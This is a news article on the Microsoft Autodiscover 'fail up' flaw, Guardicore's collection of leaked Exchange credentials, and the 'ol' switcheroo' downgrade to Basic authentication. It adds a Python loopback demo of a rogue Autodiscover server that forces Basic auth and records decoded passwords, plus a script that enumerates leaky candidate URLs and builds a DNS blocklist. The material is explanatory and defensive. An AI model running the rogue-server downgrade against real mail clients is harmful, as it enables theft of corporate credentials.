
Windows Password Leak: Autodiscover Email Bug

September 22, 2021

A Widespread Email Protocol Flaw Leads to Credential Leaks

Organizations across diverse sectors, including shipping firms, energy providers, and financial institutions, are unintentionally exposing employee email passwords. The exposure stems from a design weakness in Autodiscover, the widely used protocol with which Microsoft Exchange clients configure themselves.

Understanding Autodiscover

Autodiscover is the Microsoft Exchange feature that spares companies running their own mail servers from walking every employee through server names and ports. A mail client on a desktop or mobile device needs nothing more than the employee's email address and password: it looks the rest of the configuration up itself instead of requiring manual input.

To do so, a client derives a short list of predetermined locations from the domain part of the address, for example https://company.com/autodiscover/autodiscover.xml and https://autodiscover.company.com/autodiscover/autodiscover.xml, and requests the configuration file from each in turn, presenting the user's credentials. If the file isn't found, the client tries the remaining locations within the same domain, a process known as "failing up". If none of them answers, the user is left to configure the client by hand.

The "Fail Up" Problem and External Exposure

Certain applications, however, take one step more before giving up, and that step is the security problem. The client strips the leftmost label from the mailbox domain and tries the autodiscover name under what remains, which is a domain the company does not control, even though it sits under the same top-level domain. A lookup for company.com thus ends up at autodiscover.com, a name that anybody can register.

Consequently, whoever owns such a domain receives the stray request, and with it the employee's email address and password, which the client sends as part of the request itself, typically in an HTTP Basic authentication header that is merely base64-encoded rather than encrypted. Researchers have cautioned about this leakage, and the resulting compromise of corporate credentials, for years.

Recent Findings by Guardicore Labs

In April, Guardicore Labs registered the autodiscover names under several prominent top-level domains, including autodiscover.uk and autodiscover.fr, and pointed them at web servers that simply logged whatever leaky requests arrived.

Over four months those servers received roughly 340,000 Exchange mailbox credentials. Because many organizations let the same credentials serve as the Windows domain logon, a captured mailbox password frequently opens far more than a mailbox.

A further 96,000 credentials arrived protected by stronger authentication schemes, but the clients that sent them could be talked into re-sending the same credentials in a weaker, effectively plaintext form.

The "Ol' Switcheroo" Attack

Amit Serper, Guardicore's security research lead, devised an attack, aptly named "The ol' switcheroo," that turns those protected credentials into plaintext ones. The rogue Autodiscover server answers the client's initial, stronger authentication attempt with an HTTP 401 that demands Basic authentication instead; the client obligingly retries, re-sending the email address and password base64-encoded, which is as good as plaintext to whoever runs the server.
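The downgrade described above, re-enacted on a loopback HTTP server. This is an added example written for this page, not Guardicore's tooling or any vendor's client code. The server plays a rogue autodiscover.<tld> host; the naive client obeys whatever challenge it gets, while the hardened client checks the scheme and host of the URL that led it there before answering a Basic challenge. The hostname autodiscover.uk, the Negotiate placeholder token, the mailbox and the password are all constructed for the demo, and the demo connects over plain HTTP to 127.0.0.1 while pretending the candidate URL was an https one, so the domain-boundary check is what refuses the downgrade.

```python
"""Loopback re-enactment of the Autodiscover "ol' switcheroo" downgrade.

Added example, not Guardicore's or any vendor's code. Hostnames, tokens and
credentials are constructed for the demo.
"""
import base64
import threading
from http.client import HTTPConnection
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

AUTODISCOVER_PATH = "/autodiscover/autodiscover.xml"
# Placeholder for the first, non-Basic attempt (a real client would start an
# NTLM/Negotiate or OAuth exchange here; the token content is irrelevant).
NEGOTIATE_PROBE = "Negotiate " + base64.b64encode(b"constructed-token").decode()


class RogueAutodiscover(BaseHTTPRequestHandler):
    """Answers any non-Basic request with a Basic challenge, then harvests."""

    captured = []  # (email, password) pairs the rogue server obtained

    def do_POST(self):
        self.rfile.read(int(self.headers.get("Content-Length", 0)))  # drain body
        auth = self.headers.get("Authorization", "")
        if auth.startswith("Basic "):
            email, _, password = base64.b64decode(auth[6:]).decode().partition(":")
            RogueAutodiscover.captured.append((email, password))
            self.send_response(200)
            self.send_header("Content-Type", "text/xml")
            self.end_headers()
            self.wfile.write(b"<Autodiscover/>")  # bogus config; the harvest is done
            return
        # The switcheroo: whatever scheme the client offered, demand Basic instead.
        self.send_response(401)
        self.send_header("WWW-Authenticate", 'Basic realm="autodiscover"')
        self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def _post(host, port, authorization):
    """One Autodiscover POST; returns (status, WWW-Authenticate header)."""
    conn = HTTPConnection(host, port, timeout=5)
    try:
        conn.request("POST", AUTODISCOVER_PATH, b"<Autodiscover/>",
                     {"Authorization": authorization, "Content-Type": "text/xml"})
        resp = conn.getresponse()
        resp.read()
        return resp.status, resp.getheader("WWW-Authenticate", "")
    finally:
        conn.close()


def _basic(email, password):
    return "Basic " + base64.b64encode(f"{email}:{password}".encode()).decode()


def naive_client(host, port, email, password):
    """Obeys whatever challenge comes back, including Basic to a strange host."""
    status, challenge = _post(host, port, NEGOTIATE_PROBE)
    if status == 401 and challenge.lower().startswith("basic"):
        status, _ = _post(host, port, _basic(email, password))  # the leak happens here
    return status


def basic_allowed(candidate_url, email):
    """Assumed hardened policy (not any vendor's): Basic only over https, and
    only to the mailbox's own domain or a subdomain of it."""
    domain = email.rsplit("@", 1)[1].lower()
    u = urlsplit(candidate_url)
    host = (u.hostname or "").lower()
    return u.scheme == "https" and (host == domain or host.endswith("." + domain))


def hardened_client(host, port, candidate_url, email, password):
    """Same flow, but a Basic challenge is checked against the URL that led
    here (candidate_url) before any password leaves the machine."""
    status, challenge = _post(host, port, NEGOTIATE_PROBE)
    if status == 401 and challenge.lower().startswith("basic"):
        if not basic_allowed(candidate_url, email):
            return "refused-downgrade"
        status, _ = _post(host, port, _basic(email, password))
    return status


def run_demo():
    """Run both clients against a loopback rogue server; returns what happened."""
    RogueAutodiscover.captured.clear()
    server = HTTPServer(("127.0.0.1", 0), RogueAutodiscover)
    port = server.server_address[1]
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        # Pretend the lookup for autodiscover.uk led to this server (constructed).
        url = "https://autodiscover.uk" + AUTODISCOVER_PATH
        naive = naive_client("127.0.0.1", port, "alice@company.co.uk", "hunter2")
        hardened = hardened_client("127.0.0.1", port, url, "alice@company.co.uk", "hunter2")
    finally:
        server.shutdown()
        server.server_close()
    return {"naive": naive, "hardened": hardened,
            "captured": list(RogueAutodiscover.captured)}


if __name__ == "__main__":
    print(run_demo())
```

Running the module shows the naive client finishing with a 200 and the rogue server holding alice's password, while the hardened client stops at the 401 because autodiscover.uk is outside company.co.uk. The policy in `basic_allowed` is deliberately strict: it also refuses Basic over plain http, so a client using it cannot be downgraded by a server it reached in-domain but without TLS.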

The exposed credentials came from a wide range of organizations, including real estate firms, food producers, and publicly traded companies in China.

Impact and Mitigation Strategies

Nothing in the client tells the user that a request went astray, so for most users the leak goes entirely unnoticed. Guardicore is withholding the names of the applications responsible for most of the leaks while their developers work on fixes. Serper said that once those fixes ship, the domains will be sinkholed but remain under Guardicore's control so that nobody else can register them for malicious use.

Companies and individuals can mitigate the risk now by blocking the autodiscover names at the top-level domain (autodiscover.com, autodiscover.uk, and so on) in their DNS resolvers, proxies or firewalls, and by making sure a mailbox password is not also a domain logon password. Disabling Basic authentication on the Exchange side removes the weak form the switcheroo downgrades to. Application developers should stop the search at the boundary of the user's own domain and refuse to send credentials to any host outside it.
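An added example that re-enacts the "failing up" search described earlier on this page and derives the two mitigations just listed from it: the candidate URLs a client tries, which of them fall outside the user's domain (the ones a developer should never let the client request), and the autodiscover.<suffix> hostnames a company's resolver or proxy should refuse. This is illustrative code written for this page, not Guardicore's or any client's implementation; the candidate list and order are a simplification of what Exchange-style clients actually try (real clients also attempt http:// variants and a DNS SRV lookup), and the addresses are constructed.

```python
"""Autodiscover candidate enumeration with the "fail up" step re-enacted.

Added example, not code from the page or from Guardicore. The candidate
order is a simplification; real clients vary in the exact list they try.
"""
from urllib.parse import urlsplit

AUTODISCOVER_PATH = "/autodiscover/autodiscover.xml"


def mailbox_domain(email):
    """Domain part of the address, normalised."""
    return email.rsplit("@", 1)[1].lower().rstrip(".")


def in_domain(host, domain):
    """True when host is the mailbox domain itself or a subdomain of it."""
    host = host.lower().rstrip(".")
    return host == domain or host.endswith("." + domain)


def autodiscover_candidates(email, fail_up=True):
    """URLs a client would try, in order. With fail_up=True the last entries
    walk up the DNS tree one label at a time (company.co.uk -> co.uk -> uk);
    those are the requests that leave the organisation's control."""
    domain = mailbox_domain(email)
    hosts = [domain, "autodiscover." + domain]
    if fail_up:
        labels = domain.split(".")
        for i in range(1, len(labels)):
            hosts.append("autodiscover." + ".".join(labels[i:]))
    return ["https://" + h + AUTODISCOVER_PATH for h in hosts]


def leaky_candidates(email):
    """Candidates whose host is outside the mailbox domain: exactly the
    requests a third party holding autodiscover.<suffix> would receive.
    A hardened client drops these before making any request."""
    domain = mailbox_domain(email)
    return [u for u in autodiscover_candidates(email)
            if not in_domain(urlsplit(u).hostname, domain)]


def safe_candidates(email):
    """What a client should actually request: the in-domain subset only."""
    domain = mailbox_domain(email)
    return [u for u in autodiscover_candidates(email)
            if in_domain(urlsplit(u).hostname, domain)]


def resolver_blocklist(emails):
    """Hostnames a company resolver, proxy or firewall should refuse for this
    set of mailbox domains (the TLD-level blocking recommended above)."""
    names = set()
    for e in emails:
        names.update(urlsplit(u).hostname for u in leaky_candidates(e))
    return sorted(names)


if __name__ == "__main__":
    # Constructed sample mailboxes.
    for e in ("alice@company.co.uk", "bob@example.fr"):
        print(e)
        for u in autodiscover_candidates(e):
            flag = "LEAKS" if u in leaky_candidates(e) else "ok"
            print(f"  {flag:5} {u}")
    print("block:", resolver_blocklist(["alice@company.co.uk", "bob@example.fr"]))
```

Note that for a mailbox under a second-level registry suffix such as company.co.uk the walk passes through autodiscover.co.uk before reaching autodiscover.uk, so both names need blocking; the page's company.com example yields only autodiscover.com. A client that sticks to `safe_candidates` never generates any of them.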

Further Reading

  • Hackers are stealing years of call records from hacked cell networks
  • A security researcher commandeered a country’s expired top-level domain to save it from hackers
  • FBI launches operation to remove backdoors from hacked Microsoft Exchange servers
  • The sinkhole that saved the internet